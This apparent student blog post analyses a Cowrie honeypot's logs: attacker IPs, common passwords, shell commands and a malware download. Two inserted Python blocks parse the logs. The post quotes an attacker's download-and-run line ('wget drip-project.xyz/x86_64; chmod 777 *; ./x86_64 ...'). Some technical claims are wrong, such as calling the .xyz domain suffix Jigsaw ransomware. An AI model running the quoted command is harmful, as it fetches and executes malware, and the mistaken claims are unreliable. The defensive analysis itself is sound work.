Analysis of a Cowrie HoneyPot

Dijah
Oct 27, 2021

What is a honeypot?

You might think of the Disney character Winnie the Pooh eating honey out of a honeypot. However, a honeypot means something different in the cybersecurity world. A honeypot is used to observe and analyze malicious activity in a controlled and safe environment. Some honeypots, such as email traps and database traps, attract and trap malicious attacks. Honeypots are a valuable tool in cybersecurity because they allow cybersecurity professionals to learn about vulnerabilities and potential threats in a system. In this article, the focus will be on one honeypot: Cowrie.

Cowrie is a medium to highly interactive SSH and Telnet honeypot designed to record attacks performed by attackers on ports 22 and 23. The honeypot acts as an SSH server with weak login credentials. Once the attacker logs into the honeypot, they have access to a fake shell to execute commands.

For my final project, I used an AWS T-Pot web interface to analyze malicious activity on the Cowrie honeypot for a period of 1 day 8 hours (Oct 18, 2021 @ 10:00 to Oct 19, 2021 @ 18:00) using a Debian EC2 instance located in Northern Virginia.

Here are my findings:

Figure 1. This figure shows the top 10 source IP attackers and top 10 command-line input used on the Cowrie honeypot.

Using Kibana to filter the data, the top attacker on this honeypot is the source IP address 78.110.67.48. The Talos Intelligence webpage shows that this IP address is located in Manama, Bahrain, and is owned by LightSpeed Communications, as seen in Figure 2.

Figure 2. This figure shows information associated with the source IP address: 78.110.67.48.

Next, I used the website IPvoid.com and found the following information: the address of the building, a name associated with the company, and a phone number, as seen in Figure 3.

Figure 3. This figure shows the information about LightSpeed Communication https://www.ipvoid.com/whois/

Then, I used the website brightcloud.com for threat analysis and found out that this IP address's threat status is benign. Interesting, right?

Figure 4. This figure shows the IP address is not a threat. https://www.brightcloud.com/tools/url-ip-lookup.php
Figure 5. This figure shows the risk level of the search IP address.

Therefore, I searched for LightSpeed Communication W.L.L on Google. I found the following info about the company: it has a website, its ownership status is acquired/merged, and it provides internet service, as seen in Figure 6. I clicked on the link associated with this company. The link loads the login page seen in Figure 7.

Figure 6. This figure shows information about LightSpeed Communication W.L.L https://pitchbook.com/profiles/company/63383-95#overview
Figure 7. This figure shows LightSpeed Communication W.L.L Login page. http://www.lightspeed.com.bh/

There are two different names associated with the company, as seen in Figure 8. I searched for the name of the Founder & Vice Chairman of the company and found an article talking about the company in 2007 (https://www.arabianbusiness.com/light-years-ahead-213242.html). I could not find anything about the name associated with LightSpeed Communication W.L.L seen in Figure 3. However, I found another website that states that LightSpeed Communication W.L.L has dissolved, as seen in Figure 9.

Figure 8. This figure shows employees associated with LightSpeed Communication W.L.L. https://pitchbook.com/profiles/company/63383-95#team
Figure 9. This figure shows that LightSpeed Communication W.L.L dissolved. https://www.zawya.com/mena/en/company/Lightspeed_Communication_WLL-1003212/

Next, I analyzed the usernames and passwords that attackers used to gain access to the Cowrie honeypot. The results show that the most used username was root and the most used passwords were 1 and 1qazXSW@. I made a horizontal stacked bar graph to visually show the top usernames and passwords, seen in Figure 11.

Figure 10. This figure shows common passwords and usernames used on the Cowrie honeypot to gain access.

Now, it is time to analyze the attempted malicious activity on this honeypot.

Command-line Analysis

In Figure 1, the top attacker with the most activity on the honeypot was the IP address 78.110.67.48. Therefore, I filtered the information to only show this IP address. This IP address uses the commands shown in Figure 12.

First, the attacker tries to enable the shell built-in command and uses the command system to pass commands to a Unix shell. Second, the attacker tries to find information about the kernel data structure using the command cat /proc/mounts and installs Busybox HDKTE, a Swiss Army Knife tool in Linux. Third, the attacker moves to a temporary file labeled shm and renames the folder /bin/echo to the folder .s. Then, the attacker tries to transfer a file using the command TFTP and retrieve a file using wget. Fourth, the attacker appends the command dd bs=52 count=1 if=.s || while read i ; do echo $i; done into the .s folder. This command looks like a digital forensic command. Finally, the file .s is deleted and the attacker exits the shell.

However, this IP address did not upload a file on this honeypot.

Figure 12. The figure shows the following information such as the time and date of the attack, the eventid, geo_ip city name, geo_ip country name, and the command used filtered to the IP address 78.110.67.48
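The Kibana filtering used above (top source IPs, most used usernames and passwords, and one IP's commands) can also be reproduced offline from Cowrie's raw JSON log. The following is an added example, not code from this article or from the Cowrie project; it assumes the JSON-lines log with Cowrie's eventid, src_ip, username, password, input and timestamp fields, and the sample events are constructed with documentation-range IP addresses.

```python
import json
from collections import Counter, defaultdict

# Constructed sample in Cowrie's JSON-lines format; not data from the article.
SAMPLE_LOG = """\
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.10","timestamp":"2021-10-18T10:00:01Z","username":"root","password":"1"}
{"eventid":"cowrie.login.success","src_ip":"192.0.2.10","timestamp":"2021-10-18T10:00:03Z","username":"root","password":"1qazXSW@"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.10","timestamp":"2021-10-18T10:00:06Z","input":"cd /dev/shm"}
{"eventid":"cowrie.command.input","src_ip":"192.0.2.10","timestamp":"2021-10-18T10:00:05Z","input":"cat /proc/mounts"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.7","timestamp":"2021-10-18T11:00:00Z","username":"admin","password":"1"}
{"eventid":"cowrie.command.input","src_ip":"198.51.
"""

def summarize(lines, top=10):
    """Tally source IPs and credentials; collect each IP's commands in time order."""
    ips, users, passwords = Counter(), Counter(), Counter()
    commands, skipped = defaultdict(list), 0
    for line in lines:
        if not line.strip():
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            skipped += 1  # truncated line, e.g. the log was copied mid-write
            continue
        if not isinstance(ev, dict) or "src_ip" not in ev:
            skipped += 1
            continue
        ip, eventid = ev["src_ip"], ev.get("eventid", "")
        ips[ip] += 1
        if eventid in ("cowrie.login.failed", "cowrie.login.success"):
            users[ev.get("username")] += 1
            passwords[ev.get("password")] += 1
        elif eventid == "cowrie.command.input":
            commands[ip].append((ev.get("timestamp", ""), ev.get("input", "")))
    return {
        "top_ips": ips.most_common(top),
        "top_usernames": users.most_common(top),
        "top_passwords": passwords.most_common(top),
        "commands": {ip: [cmd for _, cmd in sorted(seen)] for ip, seen in commands.items()},
        "skipped": skipped,
    }

REPORT = summarize(SAMPLE_LOG.splitlines())
```

To run it on real data, pass an open log file instead of the sample, for example summarize(open("cowrie.json")), where the file name is an assumption about where the log was exported.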

Malware Analysis

After the command-line analysis, I looked at the malicious downloads on the Cowrie honeypot. The downloaded files were from the following IP addresses: 13.89.59.109, 68.183.180.46, and 40.86.1.181, as seen in Figure 13. In this section, the focus will be on the IP address 13.89.59.109.

Figure 13. This shows the IP addresses associated with downloading files onto the honeypot.

The IP address 13.89.59.109 tried to upload an exploit on the honeypot. The command was wget drip-project.xyz/x86_64; chmod 777 *; ./x86_64 drip_payload, as seen in Figure 14.

Figure 14. This figure shows the top URI downloads on this honeypot.

First, I pasted the hash on the website VirusTotal, and it indicated that this hash was malicious.

Figure 15. This figure shows that 35 vendors flagged this hash as malicious.

Next, I analyzed each part of the command. The first section of the command was wget drip-project.xyz/x86_64. The Linux command, wget, is used to retrieve files over the internet. The file (exploit) is drip-project.xyz and x86_64 refers to 64-bit software.

Figure 16. This figure shows that 35 vendors flagged this filename as malicious.

Upon further investigation, I found out that the extension .xyz is Jigsaw ransomware. Jigsaw ransomware encrypts various files stored on victims’ computers via asymmetric cryptography. If the encryption is successful, then .xyz ransomware opens a window that contains a ransom-demand message. The message informs victims of the encryption and demands a ransom payment to restore the files. It states that several files are deleted every 60 minutes. Finally, the website virustotal.com verifies that the file is malicious, as seen in Figure 16.

The second part of the command is chmod 777 *. Chmod is a Linux command used to change permissions on a file, and setting 777 permission on a file makes the file readable, writable, and executable by all users. Finally, the last part of the command is ./x86_64 drip_payload. The program was executed on the system.

I tried to retrieve this exploit onto my virtual machine (SIFT Workstation). However, the file could not be retrieved from the host, as seen in Figure 17.
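The fetch, chmod, run sequence broken down above can be flagged mechanically in a honeypot command line. The following is an added example, not code from this article; the function names are hypothetical, and the check is a heuristic that covers wget and curl stages and reports a program run by path whose name matches a file fetched earlier on the same line.

```python
import shlex
from urllib.parse import urlsplit

def split_stages(command_line):
    """Split a shell line into argv lists at ';', '&&', '||', '|' and '&'."""
    lexer = shlex.shlex(command_line, posix=True, punctuation_chars=";&|")
    lexer.whitespace_split = True  # combined with punctuation_chars: Python 3.8+
    try:
        tokens = list(lexer)
    except ValueError:  # unbalanced quotes in attacker input
        tokens = command_line.split()
    stages, current = [], []
    for tok in tokens:
        if tok and set(tok) <= set(";&|"):  # note: a quoted ";" also splits
            stages.append(current)
            current = []
        else:
            current.append(tok)
    stages.append(current)
    return [s for s in stages if s]

def fetched_files(stage):
    """Yield (host, filename) for each URL argument of a wget or curl stage."""
    if stage[0].rsplit("/", 1)[-1] not in ("wget", "curl"):
        return
    for arg in stage[1:]:
        if arg.startswith("-"):
            continue
        try:
            parts = urlsplit(arg if "://" in arg else "http://" + arg)
        except ValueError:  # e.g. a malformed bracketed host
            continue
        name = parts.path.rsplit("/", 1)[-1]
        if parts.hostname and name:
            yield parts.hostname, name

def download_and_execute(command_line):
    """Report stages that run, by path, a file fetched earlier on the same line."""
    fetched, chmod_seen, findings = {}, False, []
    for stage in split_stages(command_line):
        fetched.update({name: host for host, name in fetched_files(stage)})
        chmod_seen = chmod_seen or stage[0] == "chmod"
        prog = stage[0].rsplit("/", 1)[-1]
        if "/" in stage[0] and prog in fetched:
            findings.append({"host": fetched[prog], "file": prog,
                             "chmod_before_run": chmod_seen, "args": stage[1:]})
    return findings

# The command line quoted in the article.
ARTICLE_COMMAND = "wget drip-project.xyz/x86_64; chmod 777 *; ./x86_64 drip_payload"
```

Calling download_and_execute(ARTICLE_COMMAND) returns one finding naming the host, the fetched file, whether a chmod preceded the run, and the arguments passed to the program.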

Figure 17. This figure shows an unsuccessful retrieval of filename drip-project.xyz/x86_64.

Therefore, I used the following websites: abuseipdb.com and brightcloud.com to investigate this IP address. I found out the following for this IP address: the network owner is Microsoft Corporation, it is associated with Data Center/Web Hosting/Transit, and it is reported as a threat, as seen in Figures 18 and 19. However, I could not find a website for the business or a name associated with this IP address.

Figure 18. This figure shows this IP address reputation by using crowdsourced information to see what other people have reported from this IP address. https://www.abuseipdb.com/check/13.89.59.109
Figure 19. This figure shows this IP address is malicious. https://www.brightcloud.com/tools/url-ip-lookup.php

Conclusion

This is a perfect example of what cybersecurity professionals do on a daily basis. They investigate incidents and try to find the story in order to find the reason behind the attack. What is the main goal? In this project, the story was about hackers from all over the world trying to break the honeypot by using various exploits. After they have identified the threat, cybersecurity professionals analyze the threat, aka the indicator of compromise (IOC), by using various cybersecurity tools such as VirusTotal and websites to look up IP addresses. In this project, I have done command-line analysis, malware analysis, and IP location analysis. Finally, they use this information to create policies, guidelines, and procedures in their organization to build and improve their cybersecurity system. In this project, I would have recommended closing insecure ports, updating password policies, setting up an IDS/IPS to detect IP addresses not belonging to the network, etc. The possibilities are endless. Malicious attacks are inevitable in any system. The main objective of cybersecurity professionals is to learn, prepare, defend, and recover against possible malicious attacks.
